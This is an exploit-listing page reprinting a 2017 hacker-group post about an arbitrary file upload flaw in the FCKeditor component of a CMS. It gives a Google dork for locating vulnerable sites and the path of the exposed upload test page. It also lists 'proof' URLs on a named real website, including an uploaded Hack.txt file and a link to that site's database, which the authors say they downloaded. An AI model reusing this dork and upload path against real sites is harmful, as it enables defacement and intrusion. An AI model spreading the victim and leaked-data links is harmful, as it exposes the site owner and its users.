Advertisement






United Arab Network (Fckeditor) Arbitrary File Upload Vulnerability

CVE Category Price Severity
CWE-434 Not specified High
Author Risk Exploitation Type Date
Unknown High Remote 2017-12-25
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2017120250

Below is a copy:

United Arab Network (Fckeditor) Arbitrary File Upload Vulnerability
======================================================
# Exploit Title: United Arab Network (Fckeditor) Arbitrary File Upload Vulnerability
# Google Dork: intext:" Powered by Dimofinf cms Version 4.0.0 "
# Date: 2017-12-20
# Author: Iran Anonymous
# Tested on: Win 7, Linux

***************************************************

# exploit => /editor/filemanager/connectors/uploadtest.html

# Add exploit => http://www.site.com/editor/filemanager/connectors/uploadtest.html


***************************************************
# Proof : 

http://www.arbi.ws//FCKeditor/editor/filemanager/connectors/uploadtest.html

http://www.arbi.ws///userfiles/Hack.txt

***************************************************
# We have downloaded the database for this site for you :

http://www.arbi.ws//arbi.zip

===================================================== 
# Thanks to : ~~> MR.Khatar || Blackwolf_Iran ||Ormazd || Sh@d0w ||Hellish_PN (mamad khodesh) ||Rabinson || Danger BoY 
# Iranian Anonymous 
# Telegram Channel: https://t.me/irananonymous 
# Discovered By: Saman.Khan

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.